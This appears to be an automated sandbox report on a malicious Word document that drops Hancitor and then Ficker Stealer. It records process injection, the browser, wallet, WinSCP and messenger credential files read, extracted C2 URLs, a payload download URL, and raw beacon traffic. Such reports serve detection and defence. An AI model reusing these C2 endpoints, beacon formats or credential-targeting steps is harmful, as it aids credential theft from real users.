Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212B328 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0212B328
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02129B44 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_02129B44
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0212E1A8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0212E1A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02133668 SetUnhandledExceptionFilter,__encode_pointer,	3_2_02133668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0213368A __decode_pointer,SetUnhandledExceptionFilter,	3_2_0213368A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040115C SetUnhandledExceptionFilter,exit,	5_2_0040115C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00401150 SetUnhandledExceptionFilter,	5_2_00401150
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004013C9 SetUnhandledExceptionFilter,	5_2_004013C9

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pospvisis.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 50.19.92.227 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 77.222.42.67 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 8.211.241.0 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: sudepallon.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: srand04rf.ru
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 23.21.211.162 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: api.ipify.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 95.213.179.67 80	Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02113880 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,VirtualAlloc,CreateThread,CloseHandle,

3_2_02113880

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe			Jump to behavior

Source: rundll32.exe, 00000002.00000002.2345688948.0000000000940000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345919514.0000000000930000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 00000002.00000002.2345688948.0000000000940000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345919514.0000000000930000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000002.2345688948.0000000000940000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345919514.0000000000930000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02138BC2 cpuid

3_2_02138BC2

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,	3_2_021319B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	3_2_0212D3FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,	3_2_02139827
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_02131852
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_02131911
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_02131976
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_02139964
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	3_2_02131610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	3_2_0213660A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_021306AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,	3_2_021397EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	3_2_02131498
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,	3_2_021364A6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,	3_2_02130D07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoA,	3_2_0213157A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,inet_ntoa,	5_2_00415800

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\SysWOW64\svchost.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Local VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\Documents VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Local VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02135256 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

3_2_02135256

Source: C:\Windows\SysWOW64\svchost.exe

5_2_00415800

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02111AA0 GetVersion,wsprintfA,wsprintfA,

3_2_02111AA0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ficker Stealer

Source: Yara match

File source: Process Memory Space: svchost.exe PID: 2716, type: MEMORY

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.json	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\svchost.exe

File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

Jump to behavior

Remote Access Functionality:

Yara detected Ficker Stealer

Source: Yara match

File source: Process Memory Space: svchost.exe PID: 2716, type: MEMORY

Yara detected Hancitor

Source: Yara match	File source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2668, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
50.19.92.227	elb097307-934924932.us-east-1.elb.amazonaws.com	United States	14618	AMAZON-AESUS	false
77.222.42.67	sudepallon.com	Russian Federation	44112	SWEB-ASRU	true
8.211.241.0	srand04rf.ru	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
23.21.211.162	unknown	United States	14618	AMAZON-AESUS	true
95.213.179.67	pospvisis.com	Russian Federation	49505	SELECTELRU	true

Contacted Domains

Name	IP	Active
elb097307-934924932.us-east-1.elb.amazonaws.com	50.19.92.227	true
srand04rf.ru	8.211.241.0	true
pospvisis.com	95.213.179.67	true
sudepallon.com	77.222.42.67	true
api.ipify.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://srand04rf.ru/7hfjsdfjks.exe	true	Avira URL Cloud: safe	unknown
http://api.ipify.org/	false		high
http://sudepallon.com/8/forum.php	true	Avira URL Cloud: safe	unknown
http://thentabecon.ru/8/forum.php	true	Avira URL Cloud: safe	unknown
http://anspossthrly.ru/8/forum.php	true	Avira URL Cloud: safe	unknown
http://api.ipify.org/?format=xml	false		high

AV Detection:

Found malware configuration

Source: 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp

Malware Configuration Extractor: Hancitor {"Campaign Id": "0707_wvcr", "C2 list": ["http://sudepallon.com/8/forum.php", "http://anspossthrly.ru/8/forum.php", "http://thentabecon.ru/8/forum.php"]}

Multi AV Scanner detection for domain / URL

Source: srand04rf.ru	Virustotal: Detection: 13%			Perma Link
Source: pospvisis.com	Virustotal: Detection: 12%			Perma Link

Multi AV Scanner detection for submitted file

Source: 0708_3355614568218.doc

Virustotal: Detection: 37%

Perma Link

Antivirus or Machine Learning detection for unpacked file

Source: 3.2.rundll32.exe.2110000.6.unpack

Avira: Label: TR/Hijacker.Gen

Location Tracking:

Yara detected Hancitor

Source: Yara match	File source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2668, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02112CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_02112CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02112D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_02112D17
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02112D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_02112D98
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02112D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_02112D55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02112D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_02112D78
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040BAB5 CryptUnprotectData,	5_2_0040BAB5

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: c:\equate\717\862\Kil\Turn\design.pdb source: rundll32.exe, 00000003.00000002.2346397243.000000000213D000.00000002.00020000.sdmp, 0708_3355614568218.doc

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\nimb.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\nimb.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\nimb.dll	Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: nimb.dll.0.dr

Jump to dropped file

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\rundll32.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: api.ipify.org

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 50.19.92.227:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 50.19.92.227:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49172
Source: Traffic	Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49172 -> 95.213.179.67:80
Source: Traffic	Snort IDS: 2031074 ET TROJAN Win32/Ficker Stealer Activity 95.213.179.67:80 -> 192.168.2.22:49178
Source: Traffic	Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.22:49178 -> 95.213.179.67:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://sudepallon.com/8/forum.php
Source: Malware configuration extractor	URLs: http://anspossthrly.ru/8/forum.php
Source: Malware configuration extractor	URLs: http://thentabecon.ru/8/forum.php

May check the online IP address of the machine

Source: C:\Windows\SysWOW64\rundll32.exe	DNS query: name: api.ipify.org
Source: C:\Windows\SysWOW64\rundll32.exe	DNS query: name: api.ipify.org
Source: C:\Windows\SysWOW64\rundll32.exe	DNS query: name: api.ipify.org
Source: C:\Windows\SysWOW64\svchost.exe	DNS query: name: api.ipify.org
Source: C:\Windows\SysWOW64\svchost.exe	DNS query: name: api.ipify.org
Source: C:\Windows\SysWOW64\svchost.exe	DNS query: name: api.ipify.org

Downloads executable code via HTTP

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 50.19.92.227 50.19.92.227
Source: Joe Sandbox View	IP Address: 77.222.42.67 77.222.42.67

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SWEB-ASRU SWEB-ASRU

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 105Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 30 2e 30 2e 30 2e 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=0.0.0.0&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: GET /7hfjsdfjks.exe HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srand04rf.ruCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /?format=xml HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
Source: global traffic	HTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: /Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
